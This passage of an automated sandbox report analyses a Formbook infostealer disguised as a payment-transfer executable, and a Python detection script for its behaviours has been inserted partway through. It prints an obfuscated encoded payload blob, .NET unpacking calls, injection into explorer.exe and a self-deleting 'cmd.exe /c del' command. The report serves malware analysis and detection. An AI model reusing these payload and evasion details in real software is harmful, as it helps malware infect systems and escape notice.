          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_04C20D20
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_04CF2EF7
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_04CED616
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_04C46E30
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_04CF1FF1
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_04CF28EC
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_04C3B090
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_04C520A0
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_04CF20A8
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_04CE1002
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_04C2F900
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_04C44120
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_04CF22AE
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_04CEDBD2
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_04C5EBB0
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_04CF2B28
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_030AE229
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_030AD146
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_03092FB0
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_030AD625
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_03099E3C
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_03099E40
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_03092D90
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_030AD4D6
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: String function: 04C2B150 appears 35 times
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Code function: String function: 00FEB150 appears 35 times
          Source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000000.00000002.237111867.0000000000DEB000.00000004.00000020.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs Payment Transfer Copy of $274,876.00 for the invoice shipments.exe
          Source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000000.00000002.236125503.00000000006C1000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenameRegistryTimeZoneInformation.exe6 vs Payment Transfer Copy of $274,876.00 for the invoice shipments.exe
          Source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000000.00000002.237553429.0000000002A11000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameriched20.dllp( vs Payment Transfer Copy of $274,876.00 for the invoice shipments.exe
          Source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000000.00000002.237553429.0000000002A11000.00000004.00000001.sdmp | Binary or memory string: OriginalFilename vs Payment Transfer Copy of $274,876.00 for the invoice shipments.exe
          Source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000000.00000002.237553429.0000000002A11000.00000004.00000001.sdmp | Binary or memory string: l,\\StringFileInfo\\000004B0\\OriginalFilename vs Payment Transfer Copy of $274,876.00 for the invoice shipments.exe
          Source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000000.00000002.237553429.0000000002A11000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameAsyncState.dllF vs Payment Transfer Copy of $274,876.00 for the invoice shipments.exe
          Source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000000.00000002.243377494.0000000008A10000.00000002.00000001.sdmp | Binary or memory string: OriginalFilenamemscorrc.dllT vs Payment Transfer Copy of $274,876.00 for the invoice shipments.exe
          Source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000000.00000002.243638026.0000000008BE0000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameLegacyPathHandling.dllN vs Payment Transfer Copy of $274,876.00 for the invoice shipments.exe
          Source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000004.00000002.274332960.0000000000581000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenameRegistryTimeZoneInformation.exe6 vs Payment Transfer Copy of $274,876.00 for the invoice shipments.exe
          Source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000004.00000002.275294499.000000000126F000.00000040.00000001.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs Payment Transfer Copy of $274,876.00 for the invoice shipments.exe
          Source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000004.00000002.276581329.0000000002ECE000.00000040.00000001.sdmp | Binary or memory string: OriginalFilenameEXPLORER.EXEj% vs Payment Transfer Copy of $274,876.00 for the invoice shipments.exe
          Source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Binary or memory string: OriginalFilenameRegistryTimeZoneInformation.exe6 vs Payment Transfer Copy of $274,876.00 for the invoice shipments.exe
          Source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: 00000004.00000002.274205933.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.274205933.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.274647874.0000000000B30000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.274647874.0000000000B30000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000002.743334604.0000000000750000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.743334604.0000000000750000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000002.746271126.0000000004850000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.746271126.0000000004850000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000002.745639709.0000000003090000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.745639709.0000000003090000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.274608670.0000000000B00000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.274608670.0000000000B00000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.237926912.0000000003A19000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.237926912.0000000003A19000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 4.2.Payment Transfer Copy of $274,876.00 for the invoice shipments.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.2.Payment Transfer Copy of $274,876.00 for the invoice shipments.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.Payment Transfer Copy of $274,876.00 for the invoice shipments.exe.3b619d0.3.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.Payment Transfer Copy of $274,876.00 for the invoice shipments.exe.3b619d0.3.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.Payment Transfer Copy of $274,876.00 for the invoice shipments.exe.3bb65f0.2.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.Payment Transfer Copy of $274,876.00 for the invoice shipments.exe.3bb65f0.2.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 4.2.Payment Transfer Copy of $274,876.00 for the invoice shipments.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.2.Payment Transfer Copy of $274,876.00 for the invoice shipments.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe, LogIn.csBase64 encoded string: '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
          Source: 0.2.Payment Transfer Copy of $274,876.00 for the invoice shipments.exe.610000.0.unpack, LogIn.cs | Base64 encoded string: (duplicate string elided)
          Source: 0.0.Payment Transfer Copy of $274,876.00 for the invoice shipments.exe.610000.0.unpack, LogIn.cs | Base64 encoded string: (duplicate string elided)
          Source: 4.0.Payment Transfer Copy of $274,876.00 for the invoice shipments.exe.4d0000.0.unpack, LogIn.cs | Base64 encoded string: (duplicate string elided)
          Source: 4.2.Payment Transfer Copy of $274,876.00 for the invoice shipments.exe.4d0000.1.unpack, LogIn.cs | Base64 encoded string: (duplicate string elided)
          Source: classification engine | Classification label: mal100.troj.evad.winEXE@7/1@9/9
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe.log
          Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1636:120:WilError_01
          Source: unknown | Process created: C:\Windows\SysWOW64\explorer.exe
          Source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Windows\explorer.exe | File read: C:\Windows\System32\drivers\etc\hosts
          Source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000000.00000002.237553429.0000000002A11000.00000004.00000001.sdmp | Binary or memory string: INSERT INTO Itens_Aluguel VALUES(@aluguelID, @aviaoID, @validade);
          Source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000000.00000002.237553429.0000000002A11000.00000004.00000001.sdmp | Binary or memory string: Insert into Clientes values (@nome, @cpf, @rg, @cidade, @endereco, @uf, @telefone);
          Source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Virustotal: Detection: 25%
          Source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | ReversingLabs: Detection: 27%
          Source: unknown | Process created: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe 'C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe'
          Source: unknown | Process created: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe
          Source: unknown | Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
          Source: unknown | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe'
          Source: unknown | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Process created: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe
          Source: C:\Windows\SysWOW64\explorer.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe'
          Source: C:\Windows\explorer.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{317D06E8-5F24-433D-BDF7-79CE68D8ABC2}\InProcServer32
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: explorer.pdbUGP source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000004.00000002.275433894.0000000002B80000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000004.00000002.275056959.00000000010DF000.00000040.00000001.sdmp, explorer.exe, 00000009.00000002.746780644.0000000004C00000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe, explorer.exe
          Source: Binary string: explorer.pdb source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000004.00000002.275433894.0000000002B80000.00000040.00000001.sdmp
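          The Process created rows above describe three things worth alerting on: the sample launching a second copy of itself, a fresh C:\Windows\SysWOW64\explorer.exe appearing, and that explorer.exe running cmd.exe /c del against the original sample path. The script below is an added example, not code from the report or the sandbox, of turning those observations into process-creation detection logic of the kind run over Sysmon event ID 1 or EDR telemetry. The events are constructed to mirror the rows above; PIDs are illustrative and the parent is left unknown wherever the report lists the creator as "unknown".

```python
import re

# Constructed process-creation events mirroring the report's "Process created" rows.
# PIDs are illustrative; ppid None mirrors rows whose creator the report lists as "unknown".
SAMPLE = r"C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe"
EVENTS = [
    {"pid": 1000, "ppid": None, "image": SAMPLE, "cmdline": f"'{SAMPLE}'"},
    {"pid": 1004, "ppid": 1000, "image": SAMPLE, "cmdline": SAMPLE},
    {"pid": 1009, "ppid": None, "image": r"C:\Windows\SysWOW64\explorer.exe",
     "cmdline": r"C:\Windows\SysWOW64\explorer.exe"},
    {"pid": 1012, "ppid": 1009, "image": r"C:\Windows\SysWOW64\cmd.exe",
     "cmdline": rf"C:\Windows\SysWOW64\cmd.exe /c del '{SAMPLE}'"},
    {"pid": 1013, "ppid": 1012, "image": r"C:\Windows\System32\conhost.exe",
     "cmdline": r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"},
]

# "del <path>" with either quoting style; the report renders the quotes as single quotes.
DEL_RE = re.compile(r"""\bdel\b\s+["']?([^"']+?)["']?\s*$""", re.IGNORECASE)
WOW64_EXPLORER = r"c:\windows\syswow64\explorer.exe"


def norm(path: str) -> str:
    return path.strip().lower()


def analyze(events):
    """Return (pid, rule, detail) tuples for the three behaviours seen in the report."""
    by_pid = {e["pid"]: e for e in events}
    known_images = {norm(e["image"]) for e in events}
    findings = []
    for e in events:
        img = norm(e["image"])
        parent = by_pid.get(e["ppid"])

        # Rule 1: a process launches a second instance of its own image. For a
        # .NET loader this is the usual prelude to hollowing the child.
        if parent is not None and norm(parent["image"]) == img:
            findings.append((e["pid"], "self_spawn",
                             f"{e['image']} re-launched by pid {parent['pid']}"))

        # Rule 2: the 32-bit explorer.exe under SysWOW64 started as a new process.
        # The desktop shell runs from C:\Windows\explorer.exe; a freshly created
        # SysWOW64 copy is a classic injection host.
        if img == WOW64_EXPLORER:
            findings.append((e["pid"], "syswow64_explorer", e["cmdline"]))

        # Rule 3: cmd.exe /c del whose target is the image of another process in
        # the same data set, i.e. the payload removing the file it came from.
        if img.endswith(r"\cmd.exe"):
            m = DEL_RE.search(e["cmdline"])
            if m and norm(m.group(1)) in known_images:
                findings.append((e["pid"], "self_delete", m.group(1)))
    return findings


if __name__ == "__main__":
    for pid, rule, detail in analyze(EVENTS):
        print(f"pid {pid}: {rule}: {detail}")
```

          Rule 3 deliberately matches the deleted path against every image in the data set rather than only ancestors of cmd.exe, because, as the rows above show, the creator of the injected explorer.exe is not always recorded and an ancestor-only check would miss the self-deletion.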

          Data Obfuscation:

          .NET source code contains potential unpacker
          Source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe, BoundHandle.cs | .Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 0.2.Payment Transfer Copy of $274,876.00 for the invoice shipments.exe.610000.0.unpack, BoundHandle.cs | .Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 0.0.Payment Transfer Copy of $274,876.00 for the invoice shipments.exe.610000.0.unpack, BoundHandle.cs | .Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 4.0.Payment Transfer Copy of $274,876.00 for the invoice shipments.exe.4d0000.0.unpack, BoundHandle.cs | .Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 4.2.Payment Transfer Copy of $274,876.00 for the invoice shipments.exe.4d0000.1.unpack, BoundHandle.cs | .Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Code function: 4_2_004178B3 push edi; iretd
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Code function: 4_2_00419AD3 push edx; iretd
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Code function: 4_2_00416A8A pushfd ; retf
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Code function: 4_2_00409B8D pushfd ; ret
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Code function: 4_2_00417B8E push edi; ret
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Code function: 4_2_00409B8D pushfd ; ret
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Code function: 4_2_00404443 push 0000007Bh; iretd
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Code function: 4_2_0040E42C push ss; iretd
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Code function: 4_2_00419DB2 push es; iretd
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Code function: 4_2_0041667E push edx; iretd
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Code function: 4_2_0041CEB5 push eax; ret
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Code function: 4_2_0041CF6C push eax; ret
